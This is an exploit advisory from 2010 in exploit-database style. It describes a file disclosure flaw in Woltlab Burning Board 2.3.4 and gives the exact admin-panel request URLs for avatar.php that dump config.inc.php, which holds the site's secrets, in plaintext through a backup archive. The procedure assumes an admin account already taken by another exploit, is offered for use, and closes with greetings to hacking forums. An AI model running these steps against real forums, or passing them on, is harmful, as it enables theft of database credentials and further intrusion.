28 lines
No EOL
746 B
Text
28 lines
No EOL
746 B
Text
# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
|
|
# Date: 2010-11-12
|
|
# Author: SFX
|
|
# Version: 2.3.4
|
|
# CVE : N/A
|
|
|
|
After you've used the Exploit to get the admin account:
|
|
|
|
goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder
|
|
|
|
import: acp/lib
|
|
|
|
download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup
|
|
|
|
goto: http://lolcathost/wbb/acp/avatar.php?action=view
|
|
|
|
search for: config.inc.php
|
|
|
|
after you know the name (for example avatar-17.php), goto the zip archive
|
|
and open avatar-17.php
|
|
|
|
that's the config.inc.php in plaintext
|
|
|
|
tested under 2.3.4, maybe other versions work too
|
|
|
|
Greetz to:
|
|
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
|
|
Red Tiger, Samsa |